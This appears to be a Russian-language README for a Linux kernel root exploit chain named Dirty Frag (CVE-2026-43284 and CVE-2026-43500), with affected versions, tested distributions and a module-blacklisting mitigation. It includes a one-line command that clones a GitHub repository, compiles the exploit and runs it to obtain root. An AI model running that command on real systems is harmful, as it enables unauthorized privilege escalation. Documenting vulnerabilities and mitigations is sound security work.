
Цепочка эксплойтов ядра Linux (CVE-2026-43284 и CVE-2026-43500), позволяющая получить root через уязвимости записи в page cache в xfrm-ESP и RxRPC.
Linux CVE-2026-43284 & CVE-2026-43500
Скопировано у @V4bel :) Спасибо :)
В этом документе описывается класс уязвимостей Dirty Frag, впервые обнаруженный и о котором сообщил Hyunwoo Kim (@v4bel). Данный класс позволяет получить привилегии root на основных дистрибутивах Linux путём объединения уязвимости xfrm-ESP Page-Cache Write (CVE-2026-43284) и уязвимости RxRPC Page-Cache Write (CVE-2026-43500).
Dirty Frag — это случай, расширяющий класс ошибок, к которому относятся Dirty Pipe и Copy Fail. Поскольку это детерминированная логическая ошибка, не зависящая от временного окна, состояние гонки не требуется, ядро не паникует при неудачной эксплуатации, а вероятность успеха очень высока.
Подробную техническую информацию и хронологию см. здесь.
xfrm-ESP Page-Cache Write (CVE-2026-43284) была исправлена в mainline f4c50a4034e6.
RxRPC Page-Cache Write (CVE-2026-43500) была исправлена в mainline aa54b1d27fe0.
Эксплуатация: запускать только в рамках авторизованных работ !!
Однострочник: git clone https://github.com/Minime794/DirtyFrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
Пошагово:
сначала скомпилируйте эксплойт, затем запустите бинарный файл
gcc -O0 -Wall -o exp exp.c -lutil
./exp
!! Очистка
⚠️ Важно: после запуска этого эксплойта кэш страниц оказывается загрязнён. Чтобы очистить загрязнённый кэш страниц и обеспечить стабильность системы, выполните:
echo 3 > /proc/sys/vm/drop_caches
или перезагрузите систему. Затронутые версии
CVE-2026-43284: уязвимость xfrm-ESP Page-Cache Write присутствует начиная с cac2661c53f3 (2017-01-17) вплоть до f4c50a4034e6 (2026-05-05).
CVE-2026-43500: уязвимость RxRPC Page-Cache Write присутствует начиная с 2dc334f1a63a (2023-06-08) вплоть до aa54b1d27fe0 (2026-05-10).
Иными словами, эффективное время жизни уязвимостей составляет около 9 лет.
Dirty Frag был протестирован на следующих версиях дистрибутивов.
Ubuntu 24.04.4: 6.17.0-23-generic
RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed: 7.0.2-1-default
CentOS Stream 10: 6.12.0-224.el10.x86_64
AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
Fedora 44: 6.19.14-300.fc44.x86_64
...
Меры противодействия
Используйте следующую команду, чтобы удалить модули, в которых возникают уязвимости, и очистить кэш страниц.
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"
Как только каждый дистрибутив выполнит обратный перенос патча, обновитесь соответствующим образом.